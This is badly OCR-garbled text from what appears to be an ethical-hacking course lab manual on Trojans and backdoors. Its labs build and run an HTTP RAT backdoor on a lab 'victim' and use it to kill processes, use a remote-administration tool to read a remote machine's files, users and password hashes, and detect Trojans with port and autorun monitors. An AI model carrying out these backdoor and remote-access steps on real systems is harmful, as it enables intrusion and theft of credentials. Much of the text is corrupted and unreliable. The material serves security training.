The WLANS...

3% Wired AutoConfig

LO
C

Manual

loc

Cr«at«c and...

Running

Automatic

Ntt

Provide! W...

Running

Menusl

u

Menual

L0C v
>

This service ..

<

M

Mended ^Standard/

FIGURE 5 : Administrative tools - Services Window
.3
>
4. Right-click the W orld W ide W eb Pu blish in g service and select
Pro p ertie s to disable the service.




World Wide Web Publishing Service Properties (Local...
Genera1 Log On

Recovery

Dependencies

Service name:

W3SVC

Display name:

World Wide Web Publishing Service
ivides Web connectivity and administration
ugh the Internet Information Services Manager

Description:

5

Path to executable:
C:Windowssystem32svchost.exe -k iissvcs
Startup type:

Disabled

Helo me configure service startup options.

Service status:

Stopped

Start

Pause

Stop

Resume

You can specify the start parameters that apply when you start the service
from here
Start parameters

OK

Cancel

Apply

FIGURE 5 : Disable/Stop World Wide Web publishing services
.4
5.

N o w start H T T P R A T from die location Z:CEH-ToolsCEHv8
M odule 06 Trojans and BackdoorsTrojans TypesHTTP H TTPS
TrojansHTTP RAT T RO JA N .

HTTP RAT 0.31

□

r V 'k H T T P

R A T

f - W !b a c k d o o r W e b s e rv e r
J
by zOmbie

IUUI The sendnotification
option can b usedto send
e
the details to your Mail ID

?J
latest version here: [http://freenet.am/~zombie]

‫ו‬

settings
W send notification with ip address to m
ail
SMTP server 4 sending m
ail
u can specify several servers delimited with ;
sm m ru;some. other, sm server;
tp. ail.
tp.
your email address:
|you@mail.c
I.com
close FireWalls
Create

server port: [80"
Exit

FIGURE 5 : HTTP RAT m window
.5
ain

6. Disable die Send notification w ith ip address to m ail opdon.
7.


C lick C reate to create a httpserver.exe hie.



□

HTTP RAT 0.31

E ll

/ V K H T T P R A T
^kackdoor Webserver
if •T J h 20m
■
y
bie
v0.31

I

1

.
latest version here: [http://freenet.am/~zombie]
seiuriys
send notification with ip address to mail|
SMTP server 4 sending m
ail
u can specify several servers delimited with ;
|sm m ru;some. other, sm server;
tp. ail.
tp.
your email address:
|you@mail.com

1

close FireWalls
|

i

Create

j|

server port: 80

‫־‬

Exit
__

FIGURE 5 : Create backdoor
.6

HTTP RAT 0.31
02 The created
httpserver will b placedin
e
the tool directory

/ V H T T P

R A T

I -W ^backdoor Webserver
done!
la
done
send httpserver.exe 2 victim

r
c
OK

|you@mail.com

w

close FireWalls

server pork:[

Create

Exit

FIGURE 7.‫ :כ‬Backdoor server created successfully

8. The httpserver.exe tile should be created 111 die folder Z:CEHv8
M odule 06 Trojans and BackdoorsTrojans TypesHTTP H TTPS
TrojansHTTP RAT T R O JA N
9.


Double-click die tile to and click Run.



HTTP RAT TROJAN

Application Tool*
Momgc

m

Clipboard

o ®

I

to •

|

N3me

4 Downloads

|

‫ ״ח‬S
elect aone

O p e n File ‫ ־‬S e c u rity W a rn in g

[gj ‫ה־‬
Name

htlpscfvcr |

...TTP HTTPS TrojansHTTP RAT TROJANhttpservcr.cxc

‫־־‬Publisher: Unknown Publisher

*S&l Recent places

Type Application

1 . readme
^

□ D Inrert <elert10n

The publisher could not bp verified. Are you dire you want to run thk
software?

Z ittpiat

Desktop

EE s««t >1
1

01

« HITPHTIPS Trojans >

Favorites
■

to*

<harcut

SI Open ‫י‬
0 Edit
<t) History

od

[3P«te

*

BQ Newitem ‫י‬
E syaccess ‫י‬
a

IS □ I* C" / path
-J

From: Z:CEHv8 Module06 Trojans and Backdoors JrojansT‫״‬

Libraries
1 1 Documents
11

Run

Music
B

Cancel

Pictures

g£ Videos
^3.

Homegroup

This file docs not have ‫ ג‬valid digital signature that verifies its
publisher. You should only run software from publishers you trust

Hwc nI drid wa to a tom?
e a e e h t ftiv re n

T® Computer
i l . Local Oslr (C:)
4-‫ ׳‬CEH-Tcols (10.
Ip Admin (admin-p

4

items

1item selected iO.: K
B

FIGURE 5 : Running the Backdoor
.8
10. G o to T ask M anager and check if die process is running.

File

Options

Processes

View

Performance

App history

Startup

Users

Details

Services
4 %

0%

30%

52%
M em o ry

D isk

N e tw o rk

6 MB
.8

0 MB/s

0 Mbps

0%

Status

CPU

1.9%

Name

25.1 MB

0.1 MB/s

0 Mbps

0 Mbps

A p p s (2 )

Task Manager

>
>

^

Windows Explorer

B a c k g r o u n d p r o c e s s e s (9 )

H

Device Association Framework...

Microsoft Windows Search Inde...
tflf' Print driver host for applications
m

0%

3.3 MB

0 MB/s

0
%

S I Httpserver (32 bit)

1.2 MB

0 MB/s

0 Mbps

0%

4.9 MB

0 MB/s

0 Mbps
0 Mbps

l i l Snagit RPC Helper (32 bit)

1.0 MB

0 MB/s

22.4 MB

0.1 MB/s

0 Mbps

0%

j[/) Snagit Editor (32 bit)

0%
19.7%

Snagit (32 bit)

19.2 MB

0 MB/s

0 Mbps
0 Mbps

1.7%

0.9 MB

0 MB/s

OR) Spooler SubSystem App

0%

1.5 MB

0 MB/s

0 Mbps

0

t>

0%

0.8 MB

0 MB/s

0 Mbps

TechSmith HTML Help Helper (...

W i n d o ‫ : •.׳‬v f f ’‫־ '־-־‬r ‫־‬
;‫.־‬
,

~‫: ׳‬

( * ) Fewer details

FIGURE 5 : Backdoor runningin taskm
.9
anager
11. G o to W indow s Server 2008 and open a web browser to access die
W indow s 8 m achine (here “ 10.0.0.12” is die IP address ot W indow s 8
M achine).




*Drabe'S K RA
TTP T
c | I £ « ‫ ״‬iooale

P]

*

D -

w elcom e 2 IITTP_RAT infected com puter }:]
.es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace]

w plrnm e } : J

FIGURE 5 0 Access the backdoor in Host web browser
.1 :
12. C lick running processes to list the processes running on die W indow s
8 machine.
Z>nbe's HTTP_RAT

1 ■ & 1. . .iQC
,
4
0 0Zf ______
0 O

C

? 1 ‫ ־‬ioojle

P A

E-

running processez:
] ]system Process
]S/stem I kill
] srrss.exe [kill

]!M
[
]!M
[

v ‘ninit.exe fkilll
*

1

w nlogon.exe fkilll
]services.exe f kill
]!!lsass.exe [k i

v h c x r111n
c o to a <;

vcho5t.exe f:
svchostexe f kilfl
dvirr.exe Ik illl
]svchostexe [kill
evehoct.axa [MID
vchost.cxa [UdD:
]svchostexe [hjjj
spoolsv.exe [kilfl
)svchostexe |kill
]svchostexe [kill
d3cHoct.ova f l-illl
MsMpCng.exe fk illl
vc.hus»t.«x« fkilll*
svchostexe fkilll
vchost.exe [ k T
iT j
]ta«kh(>*t.*x» [kill
bckhoct.sxo ] -‫[יי‬
Mpkxar.tM [M 1
[
search indexer.exe fkilfl
]S>n«g1t32.ex• [jo j
]TscHelp.exe [kill
]SnagPri./.•** [kill
]SragitCditor.exe [ !:ill
]aplmjv164.exe f k ill
svchostexe fkilll
]httpserver.exe (kill
]Taskmor.«*x® [kill
firofox O O [UJJ[
.X

5

FIGURE 5 1 Process list of die victim com
.1 :
puter
13. Y o u can kill any running processes from here.

L a b A n a ly s is
your target’s security posture and exposure dirough public and free mformadon.





T o o l/ U tility

Successful send httpserver.exe 011 victim m achine
O u tp u t: K ille d Process
System
smss.exe
csrss.exe

H T T P T ro ja n

w inlogon.exe
serv1ces.exe
lsass.exe
svchost.exe
dwm .exe
splwow64.exe
httpserver.exe
firefow .exe

Q u e s t io n s
1.

Determ ine the ports that H T T P proxy server Trojan uses to communicate.

□ Y es

0 No

0 C lassro o m


0 iLab s



R e m o te A c c e s s T r o ja n s U s in g
A te lie r W e b R e m o te C o m m a n d e r
.4

T ro ja n is a p ro g ra m

th a t c o n ta in s m a lic io u s o r h a rm fu l cod e in s id e a p p a re n tly

h a rm le s s p ro g ra m m in g o r d a ta in
d am ag e, su ch a s m in in g th e f ile

I C O N

K E Y

/ V a lu a b le
in fo r m a tio n

y

5 T est yo u r
k n o w le d g e

TTT
TT

W e b e x e rc is e

su ch a

1r a

j th a t it

ca n g e t c o n tro l a n d cau se


A backdoor T rojan is a very dangerous in fection that com prom ises the integrity
o f a com puter, its data, and the personal inform ation o f the users. Rem ote
attackers use backdoors as a means o f accessing and taking control o f a
com puter that bypasses security m echanism s. Trojans and backdoors are types
o f bad-wares; their m ain purpose is to send and receive data and especially
com m ands through a port to another system. T his port can be even a well-

m


know n port such as 80 or an out o f the norm ports like 7777. Trojans are m ost
o f the tim e defaced and shown as legitim ate and harm less applications to
encourage the user to execute them.
Y o u are a security adm inistrator o f your com pany, and your job responsibilities

J T Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

attacks.
The objectives o f tins lab include:
•

G ain access to a rem ote com puter

•

A cquire sensitive inform ation o f the rem ote com puter

To cany out tins, you need:
1.


A te lie r W eb Rem ote Com m ander located at D:CEH-ToolsCEHv8
M odule 06 T rojan s and BackdoorsTrojans TypesRem ote A cce ss
T ro jan s (R A T )A telier W eb Rem ote Com m ander



■


■

W indow s Server 2003 running 111 Virtual M achine

111 the lab m ight d iffer
■

Y o u need a w eb browser to access In tern et

■

Adm inistrative privileges to m il tools

Tim e: 20 M inutes

O v e r v ie w


harmless programming or data 111 such a way that it can get co n tro l and cause
damage, such as ruining the file allocation table on a hard drive.
Note: The versions o f the created client or host and appearance may differ from
w hat it is 111 die lab, but die actual process o f connecting to die server and accessing
die processes is same as shown 111 diis lab.

a* T A S K

1

A telier W eb
Rem ote
Com m ander

Lab T ask s
1.

In stall and launch A te lie r W eb Rem ote Com m ander (A W R C ) 111
W indow s Server 2012.

2.

T o launch A te lie r W eb Rem ote Com m ander (A W R C ), launch the
S ta rt menu by hovering the mouse cursor on the low er-left corner o f
the desktop.
u
§
€

■ W d w S rv r21
3 in o s e e 02
su.t

MVMom Swvw M l? DMwCMidM•
Evaluator cgpt. Eud M
0C
. rw
*1
3PM 1

FIGURE 6 : Windows Server 2 1 Start-Desktop
.1
02
3. C lick AW Rem ote Com m ander Pro fessio n al 111 the S ta rt m enu apps.




Start
CtnvUcr

Administrator A

T fc
n

£

*

Tools

AW
fieoiote
Connwn..

4

&

FIGURE 6 : Windows Server 2 1 Start Menu Apps
.2
02
4.

The m ain w indow o f AW RC w ill appear as shown 111 the follow ing
screenshot.

‫סי‬
File

AWRC PRO 9.3.9
Tools

Desktop

Help
Syclnfo

Netwarklnfo

FJ# Sy*t*fn

Uc*rs

*r.Grocpc
n

Chat

‫ ט‬Tliis toll is used to
gain access to all the
information of die Rem
ote
system

Progress Report

y , Connect
df

Disconnect

0 Request ajthonrabor

kBytesIn: C

@ dear on iscomect
k8psln: 0

Connection Duraton

FIGURE 6 : Atelier Web Rem Com ander m window
.3
ote
m
ain
5.

In p u t the IP ad dress and U sernam e

I

Passw o rd o f the rem ote

com puter.

6. 1 1 tins lab we have used W indow s Server 2008 (10.0.0.13):
1
■

U ser name: A dm inistrator

■

Passw ord: qw erty@ 123

N ote: The IP addresses and credentials m ight d iffer 111 your labs
7.


C lick C onnect to access the m achine rem otely.



FIGURE 6 : Providing rem com
.4
ote
puter details
Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

8. The follow ing screenshots show that you w ill be accessing the
W indow s S e rve r 2008 rem otely.
10.0.0.13 :A W R C PRO 9.3.9

S
File

Tools

Desktop

Help
Syslnfo

Networidnfb

Fie System

Use's anc Groups

Chat

Internet Explo‫־‬er

windows update

j

Notepad

<
r
&

~
Fastest

* T F V

*29 Monitors *

Remote Host

Progress Report
| administrator

W C o n n ect
cf

□ Request ajthoniabor

k5yle*I11; 201.94

^

#1 6:28:24 Initializing, p lease w a it...
#16:2 8:25 C onnected to 1 0 .0 .0 .1 3

D isconnect

@ Clear on iscomect
k B ^ IiL 0.87

Cumeiliui 1 Duiatun: !Minute, 42 Seconds.

FIGURE 6 : Remote com
.5
puter Accessed
9.

The Com m ander is connected to the Rem ote System . C lick th eSys
Info tab to view com plete details o f the V irtu a l M achine.




FIGURE 6 : Information of the rem com
.6
ote
puter
10. Select N etw orklnfo Path w here you can view netw ork inform ation.
10.0.0.13: AWRC PRO 9.3.9

S
File

Jools

Desktop

Help
Syslnfo

| NetworiJnfo | Ffe System

Use's anc Grocps

Ports Safeties

R em ark

Perm issions

Chat

P/Transport Protocols
M a x U se s

Current U se s

Path

Passw o id

A D M IN S

net ap p lica ...

unlimited

not val■

C$

S p e .. Default share

not a p p lic a ..

unlimited

not v a li

IP CS

& Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

S p e . R em o te A dm in

S p e .. R em o te IP C

net applica

unlimited

not vaN

R em ote Host

Progress Report
# 1 6 .2 8 .2 4 Initializing, p lease wait
#1 6 :2 8 :2 5 C onnected to 10 0 .0 .1 3

^
a f

Connect

D Request ajthonrabor

Ifiytesln: 250.93

A / Disconnect
@ dear on iscomect
kSpsIn: 0.00

Connection Duraton: 5 Minutes, 32 Seconds.

.7
ote
puter
11. Select the F ile System tab. Select c: from the drop-down list and
click G et.
12. Tins tab lists the com plete files o l the C : drive o f W indow s Server
2008.




10.0.0.13: AWRC PRO 9.3.9
file

Iools

Desktop

Help
Syslnfo

contents of

NetworicJnfb

I Fie System I Use's and Groups

Chat

'c:'______

CIJ SR ecycle Bin
C l Boot
C 3 D ocum ents and Settin g s
C□ PerfLogs

D

Program Files (x86)

□

Program Files

C l Program D ata

D

System Volume Inform...

□

U sers

□

W indow s

File Sy stem :

NTFS
6C 2 7 -C D 3 9

C apacity:

1 7 ,1 7 7 ,7 6 7 .9 3 6 bytes

F ree space:

6 .5 0 5 .7 7 1 .0 0 8 bytes

Fixed

Type

Serial Number:

Labei:

Progress Report
| administrator

^ Connect
cf

]Request ajthoriratxx‫־‬

# 1 6 .2 8 .2 4 Initializing, p lease w a it...

Password

Disconnect

#1 6 :2 8 :2 5 C onnected to 1 0 .0 .0 .1 3

@ Oear on iscomect

kBytesIn: 251.64

ConnectonDuraton:

6
Minutes, 18 Seconds.

.8
ote
puter
13. Select U sers and G roups, w hich w ill display the com plete user
details.
10.0.0.13 :A W R C PRO 9.3.9
File

Jools

Desktop

jUsers

'‫" ם: ־‬

Help
Syslnfo

^ Groups

NetworkJnfo

Ffe System

Use's anc Groups

I Chat

Password Ha^ies

U se r In fo rm a tio n fo r A d m in is tra to r
U ser A cc o un t. A dm inistrator
Passw o rd A g e 7 d ays 21 hours 21 m inutes 3 3 seconds
Privilege Level: A dm inistrator
C om m ent Built-in account for adm inistering th e com puter/dom ain
Flags: Logon script executed. Norm al Account.

Full Name:
W orkstatio n s can log from: no restrictions
Last Logon: 9 /2 0 /2 0 1 2 3:58:24 A M
Last Logoff Unknown
Account expires Never expires
U se r ID (R ID ) 500
P n m ary Global Group (RID): 513
SID S 1 5 21 18 58 18 02 43 300731 51 51 16 0 0 5 9 6 2 0 0 50 0
Domain W IN -E G B H IS G 1 4 L 0
No Su b A u th o rtie s 5

Remote Host

User Name
[ administrator

10.0.0.13

W C o n n ect
nf

D Request ajthon:at>or

kByle* 11 : 256.00
1

^

D isconnect

P assw ord

Progress Report
#1 6:28:24 Initializing, p lease w a it...
#16:2 8:25 C onnected to 1 0 .0 .0 .1 3

@ Oear on iscomect
Cumeuiimi3u1atu< 1 e Minutes, 2 6 Seconds.
:

.9
ote
puter




rs

10.0.0.13: A W R C P R O 9.3.9

file

Iools

Desktop

Help
Syslnfo

NetworWnfo

We System

Use's and Groups

Chat

| Groups ~ | y Passwoid Ha«hes
N am e s

SID

Com m ent

Adm inistrators

S -1 -5-32 -5 44 (Typo A lia s/D o

Adm inistrators have com plete and unrestricted

B acku p O p e r a t o r

S -1 -5-32-551 (Type A lia s/D o

B ac ku p Operators can override security restrict

Certificate Service DC

S -1 -6 -3 2 -6 7 4 (Type A lia s /D o .

M em bers of this group are allowed to co n n ect t«

Cryptographic Ooerat

S -1 -5 -3 2 -5 6 9 (Type A lia s/D o

M em bers are authorized to perform cryptograph

Distributed C O M U s e ‫־׳‬
s

S -1 -5 -3 2 -5 6 2 (Type A lia s /D o .

M em bers are allowed to launch. ac tK ate and us

Event Log R eaders

5 -1 -5 -3 2 -5 7 3 (Type A lia s /D o ...

M em bers of this group c an read event logs from

G u ests

Groups:

S -1 -5 -3 2 -5 4 6 (Type A lia s/D o

G u e s ts have th e sa m e a c c e s s as m em bers o ft

III

<1

______I

Global
G roups:

S - 1-5 -2 1 -1 8 5 8 1 8 0 2 4 3 -3 0 0 7 3 1 5 ...

O rdinary users

Progress Report
| administrator

^ Connect
cf

]Request ajthonrabor

kBytesIn: 257.54

Disconnect

# 1 6 .2 8 .2 4 Initializing, p lease w a it...

Password

#1 6 :2 8 :2 5 C onnected to 1 0 .0 .0 .1 3

@ dear on iscomect

Connection Ouraton: ?Minutes, 34Seconds.

FIGURE 6 0 Information of the rem com
.1 :
ote
puter

FIGURE 6 1 Information of the rem com
.1 :
ote
puter
14. Tins tool w ill display all the details o f the rem ote system.
15. Analyze the results o f the rem ote com puter.

L a b A n a ly s is
your target’s security posture and exposure dirough public and tree inform ation.





T o o l/ U tility

Rem otely accessing W indow s Server 2008
R e s u lt: System inform ation o f rem ote W indow s
Server 2008

A telier W eb
Rem ote
Com m ander

N etw o rk In form ation Path rem ote W indow s Server
2008
view ing com plete files ot c: o f rem ote W indow s
Server 2008
U ser and Groups details o f rem ote W indow s Server
2008
Passw ord hashes

Q u e s t io n s
1.

Evaluate die ports that A W R C uses to perform operations.

2.

Determ ine whether it is possible to launch A W R C from the command line
and make a connection. I f ves, dien illustrate how it can be done.

□ Y es

0 No

0 C lassro om




D e te c tin g T ro ja n s
A

T ro ja n is a p ro g ra m

th a t c o n ta in s M a lic io u s o r h a rm fu l code in s id e a p p a re n tly

h a rm le s s p ro g ra m m in g o r d a ta in su ch a )ra y th a t ca n g e t c o n tro l a n d cau se d am ag e,
su ch a s m in in g th e f ile

I CON
V a lu a b le /^

KEY
1

T est yo u r

______ k n o w le d g e _________

W e b e x e rc is e

M ost individuals are confused about the possible ways to rem ove a T rojan virus

in fo r m a tio n

.‫■׳י‬
'*


^

from a specific system. O ne m ust realize that the W o rld W id e W eb is one o f
the tools that transm its inform ation as w ell as m alicious and harm ful viruses. A
backdoor T rojan can be extrem ely harm ful if not dealt w ith appropriately. The
m ain function o f tins type o f virus is to create a backdoor 111 order to access a
specific system. W ith a backdoor T rojan attack, a concerned user is unaware

d


about the possible effects u n til sensitive and im portant inform ation is found
m issing from a system . W ith a backdoor T rojan attack, a hacker can also
perform other types ot m alicious attacks as w ell. The other name fo r backdoor
Trojans is rem ote access Trojans. The m ain reason that backdoor Trojans are
so dangerous is that they hold the ab ility to access a particular m achine rem otely
(source: http://w w w .com bofix.org).
Y o u are a security7adm inistrator o f your com pany, and your job responsibilities

The objective o f this lab is to help students learn to detect T rojan and backdoor
attacks.
& Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors


•

Analyze using Po rt ]M onitor

•

Analyze using Process M o nitor

•

Analyze using Registry M o nitor

•

Analyze using Startup Program M o nitor

•

Create M D 5 hash tiles for W indow s directory files



To carry out this, you need:
■

T cp view , located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and
BackdoorsPort M onitoring T oolsTC PV iew

■

Autoruns, located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and
Backd oo rsProcess M onitoring ToolsAutoruns

■

P rcV ie w , located at C:CEH-ToolsCEHv7 M odule 06 T ro jan s and
Backd oo rsProcess M onitor ToolPrc V iew

■

Jv 1 6 pow er to ol, located at D:CEH-ToolsCEHv8 M odule 06 T rojan s
and Backd oo rsR eg istry M onitoring Toolsjv16 Po w er Tools 2012

‫י‬

Fsum FrontEnd. located at D:CEH-ToolsCEHv8 M odule 06 T rojan s
and Backd o o rsFiles and Fold er In te g rity CheckerFsum Frontend

■


& Disabling and Deleting
Entries

■

W indow s Server 2003 m nning h i V irtual M achine

If you don'twant anentry to
active die nest tim you
e
boot or login you can eidier
disable or delete it. To
disable an entryuncheckit.
Autoruns will store die
startup information in a
backup location sodiat it
canreactivate die entry
whenyou recheckit. For
item storedin startup
s
folders Autoruns creates a
subfolder nam Autoruns
ed
disabled. Checka disabled
item to re-enableit

111 the lab m ight d iffer
■

Y o u need a web browser to access In tern et

■

Adm inistrative privileges to m il tools

Tim e: 20 M inutes

O v e r v ie w


A Trojan is a program diat contains m alicio u s or harm ful code inside apparently
harmless programming or data 111 such a w ay that it can get co n tro l and cause
damage, such as ruining the file allocation table on a hard drive.
Note: The versions o f the created client or host and appearance may differ from
w hat it is 111 the lab, but the actual process o f connecting to the server and accessing
the processes is same as shown 111 tins lab.

Lab T ask s
1.

G o to W indow s Server 2012 V irtual Machine.

2.

T cpview

Install T cp view from the location D:CEH-ToolsCEHv8 Module 06 Trojans
and BackdoorsPort M onitoring ToolsTCPView .

3.

The T C P V iew main wm dow appears, w ith details such as Process, Process
ID , Protocol, Local address. Local Port, Rem ote Address, and Rem ote Port.




T P ie - S
C V w
ysin rn ls: w w
te a
w .sysin rn ls.co
te a
m

File O tio s P ce V
p n ro ss iew H
elp
H a h |
|| P c ss >
ro e
P
ID
P to o
ro c l
C l dns. exe
1572
IC
P
T7d se e
n. x
17
52
IC
P
T7d se e
n. x
17
52
tCP
T7d se e
n. x
17
52
UP
D
i- d se e
n. x
17
52
UP
D
I"7d se e
n. x
17
52
UP
D
i7 d se e
‫ ־‬n. x
17
52
UP
D
i"7d se e
n. x
UP
D
17
52
IF d se e
n. x
17
52
UP
D
» d se e
n. x
17
52
UP
D
1‫ י‬d se e
n. x
17
52
UP
D
»1d se e
n. x
17
52
UP
D
T7d se e
n. x
17
52
UP
D
r d se e
n. x
17
52
UP
D
» d se e
n. x
17
52
UP
D
T d se e
n. x
17
52
UP
D
‫ י‬d se e
n. x
17
52
UP
D
r d se e
n. x
17
52
UP
D
‫ י‬d se e
n. x
17
52
UP
D
‫ ׳ י‬d se e
n. x
17
52
UP
D
1 d se e
‫ ־‬n. x
17
52
UP
D
1 d se e
n. x
17
52
UP
D
T d se e
n. x
17
52
UP
D
•‫ ו‬d se e
n. x
17
52
UP
D
• d se e
n. x
17
52
UP
D
III
‫1־‬

03 Should delete item that
s
you do notwish to ever
execute. Do so bychoosing
Delete in the Entry m
enu.
Only die currendy selected
itemwill be deleted

L c lA d s
o a d re s
win-2n9stosgien

W - N S 0G
IN 2 9 T S I..
W - N S OG
IN 2 9 T S L
w - n so g n
in 2 9t $ ie
W -2 9 0 L
IN N ST SG
W - N S 0G
IN 2 9 T S I..
W - N S OG
IN 2 9 T S L
W -2 9 0 L
IN N ST SG
W - N S OG
IN 2 9 T S L
W - N S OG
IN 2 9 T S L
W - N S 0G
IN 2 9 T S I..
W - N S OG
IN 2 9 T S L
W -2 9 0 L
IN N ST SG
W - N S OG
IN 2 9 T S I..
W - N S OG
IN 2 9 T S L
W - N S OG
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N ST SG
IN 2 9 0 L
W - N S OG
IN 2 9 T S L
W - N S OG
IN 2 9 T S I..
W - N S OG
IN 2 9 T S L

L ca P tt
o lo
domain

d min
oa
417
95
d min
oa
d min
oa
412
95
413
95
414
95
415
95
416
95
417
95
418
95
419
95
410
96
411
96
412
96
413
96
414
96
415
96
416
96
417
96
418
96
419
96
410
97
411
97

w fl
Vl
‫׳‬
/
W
l

V

1

>

___________ ___________ ___________ ___________ ___________ U
FIGURE 8 :TcpviewMainwindow
.1
tool perform port m onitoring.
T P ie -S
C V w ysin rn ls: w w
te a
w .sysin rn ls.co I ~ I □ f
te a
m
1 File O tion P cess View H lp
p s ro
e
y a ‫@ !־‬
P c ss '
ro e
P
ID
P to o
ro c l
L c lA d s
o a d re s
|L c l P rt
oa o
11s c o t.e e 3 5
1 vh s x
8S
ICP
W - N S 0 G 50
IN 2 9 T S I.. 5 4
(0 sv o x 8 2
ch ste e 9
tCP
W - N S OG 413
IN 2 9 T S I.. 9 5
H s c o t.e e 9 0
vh s x
6
ICP
W - N S O G 414
IN 2 9 T S L 9 5
1 s c o t.e e 1 5
1 vh s x
52
ICP
W - N S O G 419
IN 2 9 T S L 9 5
ITI s c o t.e e 2 8
vh s x
14
ICP
W - N S 0 G 4 11
IN 2 9 T S I.. 96
S3 s c o t.e e 3 4
vh s x
40
TP
C
W - N S OG 413
IN 2 9 T S I.. 9 6
S3 s c o t.e e 4 1
vh s x
32
TP
C
W - N S 0 G 418
IN 2 9 T S I.. 9 6
S3 s c o t.e e 4 7
vh s x
22
TP
C
W - N S OG 419
IN 2 9 T S I.. 9 6
S3 s c o t.e e 1 0
vh s x
88
TP
C
W - N ST SG 4 1 7
IN 2 9 0 L 9 8
1 s c o t.e e 1 5
'‫ י‬v h s x
52
UP
D
w - n s s ie
in 2 9tog n b o s
o tp
S3 s c o t.e e 1 5
vh s x
52
UP
D
w - n s s ie
in 2 9tog n b o c
o tp
1‫ י‬s c o t.e e 9 0
' vh s x
S
UP
D
W - N S 0 G is k p
IN 2 9 T S I... a m
UP
D
w - n s s ie
in 2 9tog n 2 3
S3 s c o t.e e 1 5
vh s x
52
55
1 s c o t.e e 3 9
3 vh s x
02
UP
D
W - N S O G 39
IN 2 9 T S L 31
E3 s c o t.e e 9 0
vh s x
6
UP
D
W - N ST SG te d
IN 2 9 0 L re o
S3 s c o t.e e 9 0
vh s x
6
UP
D
W - N S 0 G ipe- s
IN 2 9 T S I... s c mft
S3 sv o x 1 6
ch ste e 0 4
UP
D
W - N S O G llmr
IN 2 9 T S L n
S3 s c o t.e e 9 0
vh s x
6
UP
D
w - n s s ie
in 2 9tog n 541
34
4
T7 S s m
y te
TP
C
w - n s s ie
in 2 9tog n n tb s s n
e io-s
4
1 ‫ י‬Ss m
y te
TP
C
w - n s s ie
in 2 9tog n mr s f- s
icoot d
4
•1S s m
y te
TP
C
w - n s s ie
in 2 9tog n mr s f- s
icoot d
•' S s m
y te
4
TP
C
W - N S OG h
IN 2 9 T S I... ttp
4
7‫ י י‬Ss m
y te
TP
C
W - N S OG h s
IN 2 9 T S I... ttp
T 7 Ss m
y te
4
TP
C
W - N S O G mr s f- s
IN 2 9 T S I... icoot d
•1S s m
y te
4
TP
C
W - N S OG 58
IN 2 9 T S I... 9 5
III
n

Cl If you are running
Autoruns without
administrative privileges on
Windows Vista and attem
pt
to change die state of a
global entry, you'll be denied
access

X

1 ^
R
W
l
W
l
W
l
W
l
W
l
W
l
W
l
W
l
W
l

*
*
W
l
w
ir
w
ir
W
l
W
l
Wl
Wl v
>

FIGURE 8 :TcpviewMainwindow
.2
5.


N ow it is analyzing die SM T P and odier ports.



TCPView -Sysinternals: www.sysinternals.com
File

y
& Autoruns will display a
dialogwith abutton that
enables you to re-launch
Autoruns with
administrative rights. You
can also use the e
com and-line option to
m
launch initially launch
Autoruns with
administrative rights

Cl There are several w to
ays
get m information about
ore
anautorun location or entry.
To view alocation or entry
in Explorer or Regedit
choseJump To in the Entry
m or double-click on the
enu
entry or location's line in the
display

Options

Process

View

‫ד‬

Help

a

“ too
ro c l
C
P
C
P
C
P
C
P
C
P
C
P
C
P
C
P
C
P
C
P
D
P
D
P
D
P
D
P
D
P
D
P
D
P
D
P
D
P
C
P
C
P
C
P
C
P
C
P
C
P
<

L ca A d s
o l d re s
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
w - n s s ie
in 2 9tog n
w - n s s ie
in 2 9tog n
W -2 9 0 L
IN N ST SG
w - n s s ie
in 2 9tog n
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W - N S OG
IN 2 9 T S L
W -2 9 0 L
IN N ST SG
w - n s s ie
in 2 9tog n
w - n s s ie
in 2 9tog n
w>29t s ie
ir - n sog n
wv n $ s ie
ir 2 9 tog n
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG
W -2 9 0 L
IN N ST SG

L ca P rt
o lo
38
38
50
54
413
95
414
95
419
95
411
96
413
98
418
96
419
96
417
98
bo s
o tp
bo c
o tp
is k p
am
23
55
39
31
te d
re o
ip e mft
sc s
llmr
n
5 41
34
n tb s s n
e io-s
mr s f- s
icoot d
mr s f- s
icoot d
h
ttp
h s
ttp
mr s f- s
icoot d
III

R m teA d s
e o d re s
W - N ST SG
IN 2 9 0 L
W - N ST SG
IN 2 9 0 L
W -2 9 0 L
IN N ST SG
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
W - N S 0G
IN 2 9 T S I..
x

R m teP tt
eo o
0
0
0
0
0
0
0
0
0
0
*

*
*

‫יי‬
‫יי‬
‫יי‬
‫יי‬

*

‫יי‬

‫יי‬

‫יי‬
‫יי‬

‫יי‬
‫י‬
‫י‬

Stat
LIST
LIST
LIST
LIST
LIST
LIST
LIST
LIST
LIST
LIST

*

‫יי‬

W - N ST SG 0
IN 2 9 0 L
w - g h g40 4 1 8
in e b is l 1
95
w d w8
in o s
441
98
0
W - NS 0 G
IN2 9 T S I..
W - N S 0G 0
IN 2 9 T S I..
W - N S 0G 0
IN 2 9 T S I..
.
‫ך‬

LIST
EST,
EST,
LIST
LIST
LIST
‫ח־‬

FIGURE 8 :Tcpviewan
.3
alyzin ports
g
Y o u can also kill die process by double-clicking diat respective process, and
then clicking die End Pro cess button.

